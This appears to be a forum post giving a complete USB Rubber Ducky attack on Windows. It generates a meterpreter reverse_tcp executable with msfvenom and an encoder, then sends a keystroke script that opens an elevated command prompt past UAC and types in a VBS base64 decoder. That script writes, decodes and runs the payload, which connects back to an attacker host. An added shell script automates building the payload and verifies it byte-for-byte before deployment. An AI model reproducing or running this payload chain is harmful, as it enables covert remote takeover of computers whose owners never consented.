So I have seen people having issues with downloading a meterpreter payload and getting it to run from the ducky.

I went for a different approach. I decided to try to modify this script from the wiki (I think Darren did a segment on it) in a different way. Here is what I came up with.
  1. Create the exe from msfvenom with the params to connect to the metasploit handler
  2. Encode the exe with base64
  3. Edit the encoding to be duckyfied
  4. Append the duckyfied encoded exe to met.txt
  5. Append last.txt to met.txt
  6. Ducky encoder to make the inject.bin
  7. Place on ducky sdcard
  8. ...
  9. win
# 1./2. Build the exe on stdout and base64 it so it can be typed as plain text
msfvenom -a x86 --platform windows \
-p windows/meterpreter/reverse_tcp \
LHOST=IP_ADDRESS \
LPORT=PORT \
PREPENDMIGRATE=true \
PREPENDMIGRATEPROC=notepad.exe \
ReverseConnectRetries=20 \
-b '\x00' \
-e x86/shikata_ga_nai \
-f exe |\
base64 > bad_exe.txt
# 3./4. Prefix every base64 line with STRING and follow it with ENTER (GNU sed one-line "a" form),
#       appended to met.txt, which already holds the cmd/decoder part shown below
sed -e 's/^/STRING /' -e '/STRING/ a ENTER' bad_exe.txt >> met.txt
# 5. Append the trailer: CTRL z to close copy con, decode, run
cat last.txt >> met.txt
# 6. Encode the finished ducky script to inject.bin
java -jar encoder.jar -i met.txt -o inject.bin

Contents of met.txt

REM Open an elevated cmd: Start menu, type cmd, context menu, "a" for Run as administrator, LEFTARROW + ENTER on the UAC prompt
ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 600
LEFTARROW
ENTER
DELAY 400
REM Type the base64 decoder into c:\decoder.vbs with copy con (MSXML bin.base64 decodes, ADODB.Stream writes the bytes); each ENTER ends one VBS line
STRING copy con c:\decoder.vbs
ENTER
STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = 
STRING CreateObject("Scripting.FileSystemObject"):
ENTER
STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = 
STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function 
STRING decodeBase64(base64):
ENTER
STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub 
STRING writeBytes(file, bytes):Dim binaryStream:
ENTER
STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
ENTER
CTRL z
ENTER
REM Start copy con for the payload text; the STRING/ENTER lines produced by the sed command above are appended directly after this line
STRING copy con c:\bad_exe.txt
ENTER

Contents of last.txt

REM CTRL z closes the copy con started at the end of met.txt, then decode and run the exe
CTRL z
ENTER
STRING cscript c:\decoder.vbs c:\bad_exe.txt c:\bad.exe
ENTER
STRING c:\bad.exe
ENTER
STRING exit
ENTER
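
As an added example (not the original poster's script, and not part of the wiki script), here is a small POSIX shell script that automates steps 2 to 5 of the procedure above and then does the check I would want before burning an inject.bin: it reverses the duckification exactly the way c:\bad_exe.txt is reassembled on the target (only the STRING lines typed after "copy con c:\bad_exe.txt" and before the closing CTRL z) and compares the decoded bytes with the original exe. It assumes GNU coreutils (base64 -w), awk and cmp; the function names duckify, unduckify, build_met, verify_roundtrip, payload_lines and the file name met_head.txt are my own choices.

```shell
#!/bin/sh
# Added example, not the original poster's script. Automates steps 2-5 of the post
# (base64 -> STRING/ENTER lines -> met.txt) and then reverses the process, so the
# bytes decoder.vbs will reassemble on the target can be checked against the exe
# before encoder.jar is run. Assumes GNU coreutils (base64 -w), awk and cmp.
# All function and file names here are my own (assumptions, not from the post).

# duckify EXE: base64 the file and turn each 76-char line into "STRING <line>" + "ENTER",
# the same output the sed one-liner in the post produces.
duckify() {
    base64 -w 76 "$1" | awk '{ print "STRING " $0; print "ENTER" }'
}

# build_met HEADER EXE LAST OUT: header ducky script (must end with the
# "copy con c:\bad_exe.txt" + ENTER lines), then the duckified exe, then last.txt.
build_met() {
    cat "$1" > "$4"
    duckify "$2" >> "$4"
    cat "$3" >> "$4"
}

# unduckify MET: re-create c:\bad_exe.txt as the target will see it. Only STRING lines
# after "copy con c:\bad_exe.txt" and before the closing CTRL z are payload; the
# cmd/VBS STRING lines before that marker must not be decoded.
unduckify() {
    awk '
        /^STRING copy con c:\\bad_exe\.txt$/ { inside = 1; next }
        inside && /^CTRL z$/                  { exit }
        inside && sub(/^STRING /, "")         { print }
    ' "$1" | base64 -d
}

# verify_roundtrip EXE MET: exit status 0 only if unduckify(MET) is byte-identical to EXE.
verify_roundtrip() {
    _rt_tmp=$(mktemp)
    unduckify "$2" > "$_rt_tmp"
    if cmp -s "$1" "$_rt_tmp"; then _rt_rc=0; else _rt_rc=1; fi
    rm -f "$_rt_tmp"
    return "$_rt_rc"
}

# payload_lines MET: number of STRING lines the ducky has to type for the payload alone,
# a quick way to estimate how long the keystroke injection will take.
payload_lines() {
    awk '
        /^STRING copy con c:\\bad_exe\.txt$/ { inside = 1; next }
        inside && /^CTRL z$/                  { exit }
        inside && /^STRING /                  { n++ }
        END { print n + 0 }
    ' "$1"
}

# Usage: sh duckify.sh met_head.txt bad.exe last.txt   (writes met.txt and verifies it)
if [ "$#" -eq 3 ]; then
    build_met "$1" "$2" "$3" met.txt
    if verify_roundtrip "$2" met.txt; then
        echo "met.txt OK: $(payload_lines met.txt) payload lines, bytes round-trip"
    else
        echo "met.txt BROKEN: decoded bytes differ from $2" >&2
        exit 1
    fi
fi
```

The round-trip check catches the failure mode that is hardest to debug from the target side: a dropped or mangled STRING line leaves you with a bad_exe.txt that base64-decodes without complaint but produces an exe that will not run, and at that point all you have is a dead shell and no error message.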